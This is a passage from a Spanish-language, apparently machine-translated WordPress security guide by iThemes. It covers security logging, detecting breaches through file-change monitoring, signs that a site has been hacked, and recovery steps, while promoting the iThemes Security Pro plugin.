Puede habilitar reCAPTCHA en su registro de usuario de WordPress, restablecer contraseña, inicio de sesión y comentarios. iThemes Security Pro le permite ejecutar la secuencia de comandos reCAPTCHA de Google en todas las páginas para aumentar la precisión de su puntaje bot frente a humano.

Terminando

Hay buenos y malos bots. reCAPTCHA bloquea los bots malos de su sitio web sin interferir con los bots buenos que aportan valor.

Sección 9: Registros de seguridad de WordPress

El registro es una parte esencial de su estrategia de seguridad de WordPress. Un registro y una supervisión insuficientes pueden provocar un retraso en la detección de una infracción de seguridad. La mayoría de los estudios de infracciones muestran que el tiempo para detectar una infracción es de más de 200 días. Esa cantidad de tiempo le permite a un atacante violar otros sistemas, modificar, robar o destruir más datos. Es por esas razones que Insufficient Logging aterrizó en el top 10 de OWASP de riesgos de seguridad de aplicaciones web.

Los registros de seguridad de WordPress tienen varios beneficios en su estrategia de seguridad general.

1. Identificar y detener comportamientos maliciosos.
2. Detecte actividad que pueda alertarle de una infracción.
3. Evalúe cuánto daño se hizo.
4. Ayudante en la reparación de un sitio pirateado.

Si su sitio es pirateado, querrá tener la mejor información para ayudar en una investigación y recuperación rápidas.

¿Qué son los registros de seguridad de WordPress?

Los registros de seguridad de WordPress en iThemes Security Pro realizan un seguimiento de los eventos de seguridad importantes que ocurren en su sitio web. Es importante supervisar estos eventos para indicar si se produce una infracción de seguridad o cuándo.

Los registros de seguridad de su sitio web son una parte vital de cualquier estrategia de seguridad. La información que se encuentra en estos registros se puede utilizar para bloquear a los malos actores, resaltar un cambio no deseado en el sitio y ayudar a identificar y parchear el punto de entrada de un ataque exitoso.

Eventos de seguridad rastreados y registrados por iThemes Security

Aquí hay un vistazo a los eventos de seguridad de WordPress rastreados por el complemento iThemes Security Pro.

1. Ataques de fuerza bruta de WordPress

Los ataques de fuerza bruta se refieren al método de prueba y error utilizado para descubrir nombres de usuario y contraseñas para piratear un sitio web. WordPress no rastrea la actividad de inicio de sesión de ningún usuario, por lo que no hay nada integrado en WordPress que lo proteja de un ataque de fuerza bruta. Depende de usted controlar la seguridad de su inicio de sesión para proteger su sitio de WordPress.

Afortunadamente, un ataque de fuerza bruta no es muy sofisticado y es bastante fácil de identificar en sus registros. Deberá registrar el nombre de usuario y la IP que está intentando iniciar sesión y si el inicio de sesión fue exitoso. Si ve que un solo nombre de usuario o IP tiene intentos de inicio de sesión fallidos consecutivos, es probable que esté bajo un ataque de fuerza bruta.

Una vez que sepa que su sitio web está siendo atacado, ¡puede detenerlo! Es importante recordar que no hay forma de evitar que ocurra un ataque en su sitio web. Pero, al monitorear los intentos de inicio de sesión no válidos, puede evitar que esos ataques tengan éxito.

iThemes Security Pro es excelente para bloquear a los malos. Sin embargo, si un chico malo usara el nombre de usuario Bob en un ataque de fuerza bruta, y Bob es un usuario real en el sitio, Bob, desafortunadamente, quedaría bloqueado junto con el atacante.

Aunque se siente muy bien evitar que los malos entren en un sitio, no nos gusta cuando la seguridad afecta la experiencia de los usuarios reales. Creamos Magic Links para permitir que los usuarios legítimos eludan el bloqueo del nombre de usuario, mientras que el atacante de fuerza bruta permanece bloqueado.

2. Análisis de malware

No solo debe ejecutar escaneos de malware, sino que también debe registrar los resultados de cada escaneo de malware en sus registros de seguridad de WordPress. Algunos registros de seguridad solo registrarán los resultados del análisis que encontraron malware, pero eso no es suficiente. Es fundamental que se le avise lo antes posible de una infracción en su sitio web. Cuanto más tiempo te lleve saber sobre un hack, más daño hará.

Si bien se siente bien ver que el historial de un enfoque proactivo de la seguridad da sus frutos, eso es solo una ventaja y no la razón para registrar cada escaneo de malware.

Si no está documentando sus escaneos programados, no tendrá forma de saber si hay fallas en el escaneo. Si no registra escaneos fallidos, podría pensar que su sitio está siendo revisado diariamente en busca de malware, pero, en realidad, el escaneo no se completa.

Lea la publicación destacada de la función Site Scan para saber cómo iThemes Security Pro puede protegerlo de la causa número uno de los hacks de WordPress.

3. Actividad del usuario

Mantener un registro de la actividad del usuario en sus registros de seguridad de WordPress puede ser su salvación después de un ataque exitoso.

Si supervisa la actividad correcta del usuario, puede guiarlo a través de la línea de tiempo de un pirateo y mostrar todo lo que cambió el pirata informático, desde agregar nuevos usuarios hasta agregar anuncios farmacéuticos no deseados en su sitio.

iThemes Security Pro monitorea 5 tipos de actividad del usuario:

1. Iniciar sesión / Cerrar sesión

El primer tipo de actividad de usuario registrada es cuando los usuarios inician y cierran sesión en su sitio web y desde dónde. Monitorear el tiempo y la ubicación de los inicios de sesión del usuario puede ayudarlo a detectar un usuario que está comprometido. ¿Ese usuario inició sesión en un momento inusual o desde un lugar nuevo? Si es así, es posible que desee comenzar su investigación con ellos.

2. Creación / registro de usuarios

La siguiente actividad de la que debe mantener un registro es la creación de usuarios, especialmente la creación de usuarios administradores. Si un pirata informático puede comprometer a un usuario legítimo, puede crear su propio usuario administrador en un intento de ocultarse. Es fácil para ti notar algo extraño en tu cuenta, pero es mucho más difícil identificar actividad maliciosa en otro usuario.

El seguimiento del registro de usuarios también es fundamental. Algunas vulnerabilidades permiten a los piratas informáticos cambiar el nuevo rol de usuario predeterminado de suscriptor a administrador.

Si tiene el registro de usuarios configurado solo para monitorear la actividad de los usuarios administradores, solo se registrará el registro de nuevos usuarios administradores en los registros de seguridad. Por lo tanto, si alguna vez ve a un usuario recién registrado en sus registros de seguridad, algo salió mal.

3. Agregar y eliminar complementos

Es vital hacer un registro de quién agrega y quita complementos. Una vez que su sitio ha sido pirateado, al atacante le resultará fácil agregar su complemento personalizado para inyectar código malicioso en el sitio web.

Incluso si un pirata informático no tiene acceso a su servidor o base de datos, es posible que aún pueda realizar cambios desde su panel de WordPress. Con un complemento, pueden agregar redireccionamientos a su sitio para usar en su próxima campaña de publicidad no deseada o inyectar malware en su base de datos. Una vez que se ejecuta su código malicioso, pueden eliminar el complemento para eliminar las pruebas de su delito. Por suerte para nosotros, no nos perderemos nada porque todo estaba documentado en nuestros registros de seguridad de WordPress.

4. Cambiar de tema

Otra actividad del usuario supervisada por el registro de usuarios de iThemes Security Pro es cuando alguien cambia el tema del sitio web. Si alguna vez descubre que su tema ha cambiado inesperadamente, puede buscar en los registros de seguridad de WordPress para averiguar quién hizo el cambio.

5. Cambios en publicaciones y páginas

Finalmente, desea monitorear cualquier cambio en su publicación y páginas. ¿Se han agregado enlaces para enviar su tráfico a otros sitios? Monitorear publicaciones y páginas puede ayudarlo a encontrar páginas vergonzosas o enlaces maliciosos agregados a su sitio web después de una infracción.

Para saber qué publicación se modificó, haga clic en los enlaces Ver detalles para encontrar el ID de la publicación.

Consulte la publicación destacada de la función Registro de usuarios para obtener más información sobre cómo el monitoreo de la actividad del usuario puede ayudarlo a regresar de un ataque.

Terminando

El registro insuficiente es uno de los 10 principales riesgos de seguridad de las aplicaciones web de OWASP. Monitorear el comportamiento correcto lo ayudará a identificar y detener ataques, detectar una brecha y acceder y reparar el daño causado a su sitio web después de un ataque exitoso.

Sección 10: Cuando ocurre un desastre de seguridad de WordPress

Incluso si sigue las mejores prácticas de seguridad de WordPress, todavía existe la posibilidad de que su sitio se vea comprometido. Un compromiso significa que un pirata informático violó su sitio web y lo infectó con malware.

¿Qué es una infracción de seguridad?

Una brecha de seguridad es cuando un ciberdelincuente puede obtener acceso no autorizado a su sitio web o servidor. Las brechas de seguridad pueden ocurrir de muchas maneras diferentes, ya que los piratas informáticos aprovechan algunos de los problemas de seguridad más comunes de WordPress. Desde la ejecución de versiones obsoletas de complementos y temas hasta inyecciones de SQL más complicadas, incluso los propietarios de sitios más atentos pueden sufrir una infracción de seguridad.

Es hora de detectar una infracción de seguridad: un factor clave para limpiar un sitio web infectado

¿Sabía que el tiempo medio que se tarda en descubrir una infracción de un sitio web es de 200 días? Desafortunadamente, cuanto más tiempo tardes en notar una infracción, más daño puede causar un pirata informático a tu sitio web, a tus clientes y a ti. Una pieza de malware puede causar una cantidad asombrosa de daño en 200 días. Por eso es tan importante reducir el tiempo que lleva detectar una brecha de seguridad.

¿Por qué? La limpieza y el tiempo de inactividad que necesitará para limpiar su sitio web después de 200 días de daños también son asombrosos. El tiempo para investigar todo lo que tocó el malware y qué datos del cliente fueron robados solo aumenta mientras la violación permanece sin ser detectada. Sin mencionar el tiempo que tendrá que dedicar a informar a los clientes que necesitan cancelar sus tarjetas de crédito porque un pirata informático registró todas las pulsaciones de teclas mientras visitaban su sitio web.

El costo de ser pirateado es grande. Tienes que pagarle a alguien para que investigue la infracción y limpie tu sitio web. El especialista en reparación de piratas informáticos tendrá que retirar su sitio web mientras funcionan, y las personas no podrán realizar nuevas compras mientras su sitio web esté inactivo. Después de perder la confianza de su cliente, es probable que pierda las compras futuras que le hubieran dado.

El costo de un pirateo es la razón por la que es crucial notar una infracción lo antes posible. Cuanto más rápido descubra la infracción, más rápido podrá evitar que se produzcan más daños y más rápido podrá volver a poner su sitio web y su negocio en línea.

¿Son suficientes los escáneres de malware?

Los escáneres de malware proporcionan una forma de escanear su sitio web de WordPress en busca de archivos y scripts maliciosos conocidos. Pero, ¿son suficientes los escáneres de malware para detectar una brecha de seguridad?

En una palabra, no. No crea que puede confiar únicamente en un escáner de malware para comprobar si su sitio web está infectado. Ningún escáner de malware puede identificar cada pieza de malware que existe. Si te encuentras con un escáner de malware que afirma que es 100% preciso, debes ejecutarlo porque los escaneos que hacen afirmaciones como esta suelen ser los menos precisos que existen.

Detección de malware de firma frente a comportamiento

La mayoría de los análisis de malware y el software antivirus utilizan firmas de malware para detectar malware. Los análisis de malware más avanzados utilizarán una combinación de detección de firmas y análisis de comportamiento.

Firmas de malware

Una firma de malware es una serie de bytes que se utilizan para identificar piezas conocidas de malware. Algunos escáneres de malware funcionan con una base de datos llena de firmas de malware de millones de virus conocidos.

El escaneo de malware basado en firmas es rápido, simple y detectará el 100% de las piezas de malware conocidas y bien entendidas. Todo eso es genial y detectará el malware agregado por piratas informáticos de bajo nivel.

Sin embargo, los piratas informáticos expertos saben que los escáneres de malware buscan firmas de malware conocido. Estos piratas informáticos tienen la capacidad de ocultar las firmas de malware para que su escáner promedio no los detecte.

El nuevo malware se lanza a un ritmo que los escáneres de malware no pueden mantener su base de datos actualizada con las últimas firmas. Por lo tanto, un escáner basado en firmas no podrá diferenciar entre un nuevo malware y el archivo readme.txt de un complemento.

Análisis de comportamiento

El análisis de comportamiento verifica las acciones de un software para determinar si es malicioso. Hay una gran cantidad de comportamientos diferentes que pueden considerarse sospechosos o maliciosos. Por ejemplo, iThemes Security Pro Site Scan aprovecha la API de navegación segura de Google para ayudar a mantener los sitios web seguros. Google Safe Browsing verificará si una pieza de software redirige el tráfico a un sitio malicioso conocido.

Una vez más, no existe un método infalible de detección de malware. Pero una combinación de comprobaciones de comportamiento y de firmas aumentará significativamente sus posibilidades de recibir una alerta sobre la evidencia de una violación de seguridad.

¿Qué comportamiento comparte todo el malware?

Sabemos lo crucial que es detectar una brecha de seguridad lo antes posible y que depender únicamente de la detección de malware no es suficiente. Entonces, nos preguntamos cómo iThemes Security Pro podría reducir el tiempo que tardan las personas en detectar brechas de seguridad en sus sitios web.

Si bien el tipo de daño que causa el malware en su sitio web varía mucho, lo que hace se puede reducir a una o una combinación de las siguientes tres cosas.

1. Agregar archivos : el software malicioso en forma de software espía podría agregar un archivo malicioso que registrará las pulsaciones de teclas de sus clientes a medida que ingresan la información de su tarjeta de crédito.
2. Eliminar archivos : algunos programas maliciosos eliminarán un archivo legítimo y lo reemplazarán con un archivo malicioso del mismo nombre.
3. Modificar archivos : el malware intentará ocultar su código malicioso ocultándolo en un archivo existente que modifica.

¿No sería bueno recibir una alerta sobre cambios inesperados en su sitio web para que pueda inspeccionarlos en busca de signos de una violación de seguridad?

Cómo reducir el tiempo que se tarda en detectar una infracción de seguridad

La clave para detectar rápidamente una brecha de seguridad es monitorear los cambios de archivos en su sitio web.

La función de detección de cambios de archivos en iThemes Security Pro escaneará los archivos de su sitio web y le avisará cuando se produzcan cambios en su sitio web.

Hay varias razones legítimas por las que vería actividad de cambio de archivos nuevos en sus registros, pero si los cambios realizados fueron inesperados, debe tomarse el tiempo para asegurarse de que los cambios no sean maliciosos. Por ejemplo, si ve un cambio realizado en un complemento en la misma fecha y hora en que actualizó el complemento, no habría razón para investigar.

Cómo habilitar la detección de cambios de archivos en iThemes Security Pro

Para comenzar a monitorear los cambios de archivos, habilite la Detección de cambios de archivos en la página principal de la configuración de seguridad.

Una vez que la Detección de cambios de archivos esté habilitada, iThemes Security Pro comenzará a escanear todos los archivos de su sitio web en trozos . Escanear sus archivos en trozos ayudará a reducir los recursos necesarios para monitorear los cambios en los archivos.

El escaneo de cambio de archivo inicial creará un índice de los archivos de su sitio web y sus hashes de archivo. Un hash de archivo es una versión abreviada y no legible por humanos del contenido del archivo.

Una vez que se completa el escaneo inicial, iThemes Security Pro continuará escaneando su archivo en trozos. Si el hash de un archivo cambia en uno de los análisis posteriores, eso significa que el contenido del archivo ha cambiado.

También puede ejecutar un cambio de archivo manual haciendo clic en el botón Escanear archivos ahora en la configuración de Detección de cambio de archivo

Activación de correos electrónicos de notificación de cambio de archivo

Los cambios de archivo ocurren todo el tiempo, y recibir una alerta por correo electrónico por cada cambio rápidamente se volvería abrumador. Y antes de que te des cuenta, se convierte en un niño que llora la situación de lobo, y comienzas a ignorar las alertas de cambio de archivo por completo.

Echemos un vistazo a cómo iThemes Security Pro identifica de manera inteligente los cambios legítimos para reducir las notificaciones y cómo puede silenciar las notificaciones de los archivos que se espera que se actualicen con frecuencia.

Puede administrar todas sus notificaciones de seguridad de iThemes desde el Centro de notificaciones dentro del complemento de seguridad de iThemes. Desde su panel de administración de WordPress, visite Seguridad> Configuración y busque el módulo Centro de notificaciones .

Cómo iThemes Security Pro identifica cambios legítimos en archivos

Hay un par de formas en las que iThemes Security Pro puede detectar si un cambio realizado en un archivo era legítimo y no era motivo de preocupación. iThemes Security Pro no creará una notificación de cambio de archivo para los cambios que pueda verificar.

1. Actualizaciones de complementos / temas completadas por la administración de versiones

La función de administración de versiones en iThemes Security Pro le permite actualizar automáticamente WordPress, complementos y temas.

Si la administración de versiones completa una actualización, iThemes Security Pro sabrá la fuente de la actualización y no activará una alerta.

2. Comparación de archivos para complementos y temas de iThemes

Marque la casilla Comparar archivos en línea en la configuración de Detección de cambio de archivo para habilitar la comparación de archivos en línea.

Cada vez que se cambia un archivo en su sitio web que pertenece a un complemento o tema de iThemes, se comparará con un archivo en el servidor de iThemes. Si el hash de la versión del archivo en su sitio web coincide con el hash de la versión en el servidor de iThemes, será un cambio legítimo y no recibirá una alerta.

3. Comparación de archivos en línea de WordPress.org

Si se cambia un archivo principal de WordPress o un complemento instalado desde el repositorio de WordPress.org, el archivo se comparará con la versión de WordPress.org. Si los hash coinciden, los cambios no son maliciosos y no recibirá una alerta.

4. Exclusiones manuales

Puede excluir archivos, directorios y tipos de archivos de la Detección de cambios de archivos en la configuración de Detección de cambios de archivos.

La regla general es que está bien excluir archivos que sabe que se actualizarán con regularidad. Los archivos de respaldo y caché son un ejemplo perfecto de esto. La exclusión de este tipo de archivos calmará gran parte del ruido adicional.

7 señales de que su sitio web de WordPress fue pirateado

Te encuentras preguntándote: “ ¿Mi sitio de WordPress está pirateado? ”Significa que querrá algunas respuestas rápidas.

Cuanto más rápido observe los signos de una infracción del sitio web, más rápido podrá limpiar su sitio. Cuanto más rápido pueda limpiar su sitio web, menos daño puede causar el hackeo a su sitio web.

1. Tu página de inicio es diferente

Los cambios en su página de inicio parecen una señal obvia. Pero, ¿cuántas veces realizas una verificación exhaustiva de tu página de inicio? Sé que normalmente voy directamente a mi URL de inicio de sesión y no a mi URL de inicio. Desde allí, inicio sesión, actualizo mi sitio o edito una publicación. Después de terminar lo que vine a hacer, a menudo me voy sin mirar la página de inicio de mi sitio web.

El objetivo principal de algunos trucos es rastrear un sitio web o ganar notoriedad. Por lo tanto, solo cambian su página de inicio por algo que les parezca divertido o para dejar una tarjeta de visita pirateada .

Si nota un cambio en su página de inicio, puede restaurar su sitio web rápida y fácilmente utilizando un archivo de respaldo creado con un complemento de respaldo confiable de WordPress como BackupBuddy.

2. El rendimiento de su sitio web ha disminuido

Su sitio puede sentirse lento cuando tiene una infección. Puede experimentar ralentizaciones en su sitio web si está experimentando ataques de fuerza bruta o si hay un script malicioso que utiliza los recursos de su servidor para la minería de criptomonedas. De manera similar, un DDoS (o ataque de denegación de servicio ) ocurre cuando una red de IP envía simultáneamente solicitudes a su sitio web en un intento de hacer que se bloquee.

3. Su sitio web contiene anuncios emergentes maliciosos o de spam

Existe una buena posibilidad de que un pirata informático haya comprometido su sitio web si sus visitantes ven ventanas emergentes que los redirigen a un sitio web malicioso. El objetivo de este tipo de ataque es desviar el tráfico de su sitio al sitio del atacante para que puedan dirigirse a los usuarios con fraude de clics para publicidad de pago por clic.

Lo más frustrante de este tipo de truco es que es posible que no pueda ver las ventanas emergentes. Se puede diseñar un truco emergente para que no se muestre a los usuarios que han iniciado sesión, lo que reduce las probabilidades de que los propietarios de sitios web los vean. Entonces, incluso cuando el propietario del sitio cierra la sesión, las ventanas emergentes nunca se mostrarán.

Su vista de las ventanas emergentes también puede ser limitada si usa una extensión de bloqueador de anuncios en su navegador. Por ejemplo, un cliente informó un hackeo de ventanas emergentes y compartió capturas de pantalla y un video de las ventanas emergentes. Después de pasar horas revisando su sitio web, no pude recrear nada de lo que estaban informando. Estaba convencido de que habían pirateado su computadora personal y no el sitio web.

Finalmente, me di cuenta de por qué no podía ver las ventanas emergentes. Había instalado una extensión de bloqueador de anuncios en mi navegador. Tan pronto como desactivé la extensión del bloqueador de anuncios, pude ver ventanas emergentes en todas partes. Comparto esta vergonzosa historia para evitar que caigas en el mismo error, con suerte.

4. Observa una disminución en el tráfico del sitio web

Si inicia sesión en su cuenta de Google Analytics y observa una fuerte disminución en el tráfico del sitio web, su sitio de WordPress podría ser pirateado. Una caída en el tráfico del sitio merece una investigación. Podría haber una secuencia de comandos maliciosa en su sitio que esté redirigiendo a los visitantes fuera de su sitio o Google ya podría incluir su sitio web en una lista negra como un sitio malicioso.

Lo primero que debe buscar es el tráfico saliente de su sitio web. Al rastrear su sitio web con Google Analytics, deberá configurar su sitio para rastrear el tráfico que sale de su sitio. La forma más fácil de monitorear el tráfico saliente en su sitio de WordPress es utilizar un complemento de WordPress Google Analytics.

6. Nuevos usuarios inesperados

Si su sitio web tiene registros inesperados de nuevos usuarios administradores, esa es otra señal de que su sitio de WordPress ha sido pirateado. A través de una explotación de un usuario comprometido, un atacante puede crear un nuevo usuario administrador. Con sus nuevos privilegios de administrador, el pirata informático está listo para causar un daño importante a su sitio.

¿Recuerda el complemento de cumplimiento de WP GDPR de antes? En noviembre de 2018, tuvimos varios informes sobre la creación de nuevos usuarios administradores en los sitios web de los clientes. Los piratas informáticos utilizaron una vulnerabilidad en el complemento WP GDPR Compliance (vulnerabilidad parcheada en la versión 1.4.3) para crear nuevos usuarios administradores en los sitios de WordPress que ejecutan el complemento. El exploit del complemento permitió a los usuarios no autorizados modificar el registro de usuario para cambiar la función predeterminada de nuevo usuario de suscriptor a administrador. Desafortunadamente, esta no fue la única vulnerabilidad y no puede simplemente eliminar a los nuevos usuarios que creó el atacante y parchear el complemento.

Si tenía WP GDPR Compliance y WooCommerce instalados, es posible que su sitio haya sido inyectado con código malicioso. Los atacantes podrían usar el instalador en segundo plano del complemento WooCommerce para insertar un instalador de puerta trasera en la base de datos. Si su sitio tiene una puerta trasera instalada, debe comunicarse con un especialista en reparación de piratas informáticos. Otra opción es utilizar un archivo de copia de seguridad para volver a una copia de su sitio web antes de la infracción utilizando una copia de seguridad anterior.

7. Usuarios administradores eliminados

Si no puede iniciar sesión en su sitio de WordPress, incluso después de restablecer la contraseña, puede ser un signo grave de infección.

Cuando el repositorio de Gentoo Github fue pirateado, lo primero que hizo el atacante fue eliminar a todos los usuarios administradores. Entonces, ¿cómo llegó este hacker a su cuenta de Github? Se descubrió la contraseña de un usuario administrador de Gentoo en un sitio diferente. Supongo que el nombre de usuario y la contraseña se descubrieron mediante raspado o un volcado de base de datos.

Aunque la contraseña del administrador para su cuenta Gentoo Github era diferente a la utilizada en la cuenta comprometida, era muy similar. Así que esto sería como si yo usara iAmAwesome2020 como contraseña en una cuenta e iAmAwesome2021 en otro sitio. Entonces, los piratas informáticos pudieron averiguar la contraseña con un poco de esfuerzo. Como podemos ver, debe usar una contraseña única para cada cuenta. Una simple variación en sus contraseñas no es suficiente. Con LastPass, puede generar y almacenar de forma segura contraseñas únicas y sólidas para cada sitio.

Cómo regresar del desastre

Si sospecha que se ha producido una infracción, hay algunos pasos rápidos que puede seguir para mitigar el daño.

Restaurar a una copia de seguridad anterior / limpia de su sitio

La forma más segura de deshacer una brecha de seguridad es restaurar su sitio a una versión anterior, antes del ataque. Por eso es tan importante contar con una solución integral de copia de seguridad de WordPress. Recomendamos usar BackupBuddy para programar copias de seguridad para que se ejecuten automáticamente para que siempre tenga una copia de seguridad.

Solo tenga en cuenta que restaurar una copia de seguridad anterior aún puede dejar su sitio vulnerable a la misma violación, por lo que es importante seguir estos pasos.

Actualice todos los complementos y temas desactualizados de inmediato

Un plugin o tema vulnerable aún puede ser el culpable, por lo que es importante actualizar INMEDIATAMENTE todos los plugins o temas obsoletos. Incluso si restaura a una versión limpia anterior de su sitio web, las mismas vulnerabilidades seguirán existiendo y pueden ser pirateadas nuevamente.

También es posible que desee verificar que no esté ejecutando un complemento o tema vulnerable que aún no tenga un parche del desarrollador. Deberá eliminar este complemento de inmediato.

Habilitar la autenticación de dos factores

Si no está utilizando la autenticación de dos factores para proteger los inicios de sesión de administrador, actívela de inmediato. Esta capa adicional de seguridad ayudará a garantizar que los usuarios no autorizados no puedan piratear ninguna cuenta de administrador.

Busque ayuda para la eliminación de malware profesional

Las brechas de seguridad de WordPress ocurren a nivel del servidor (más profundo que su instalación de WordPress), por lo que es posible que deba comunicarse con un servicio profesional de eliminación de malware. Recomendamos WeWatchYourWebsite para la eliminación de malware profesional.

Conclusión: Guía definitiva de seguridad de WordPress

En esta guía de seguridad de WordPress, ¡cubrimos MUCHO! Pero, siguiendo los consejos de esta guía, bloqueará casi el 100% de los ataques aplicados a su sitio web.

Un complemento de seguridad de WordPress puede ayudar a proteger su sitio web de WordPress

Junto con el conocimiento de los temas de seguridad de WordPress en esta guía, un complemento de seguridad de WordPress puede ayudar a proteger su sitio web de WordPress. iThemes Security Pro, nuestro complemento de seguridad de WordPress, ofrece más de 50 formas de asegurar y proteger su sitio web de las vulnerabilidades de seguridad comunes de WordPress. Con WordPress, autenticación de dos factores, protección de fuerza bruta, aplicación de contraseña sólida y más, puede agregar una capa adicional de seguridad a su sitio web.

Michael Moore

Cada semana, Michael elabora el Informe de vulnerabilidad de WordPress para ayudar a mantener sus sitios seguros. Como Product Manager en iThemes, nos ayuda a seguir mejorando la línea de productos de iThemes. Es un nerd gigante y le encanta aprender sobre tecnología, tanto antigua como nueva. Puede encontrar a Michael pasando el rato con su esposa e hija, leyendo o escuchando música cuando no está trabajando.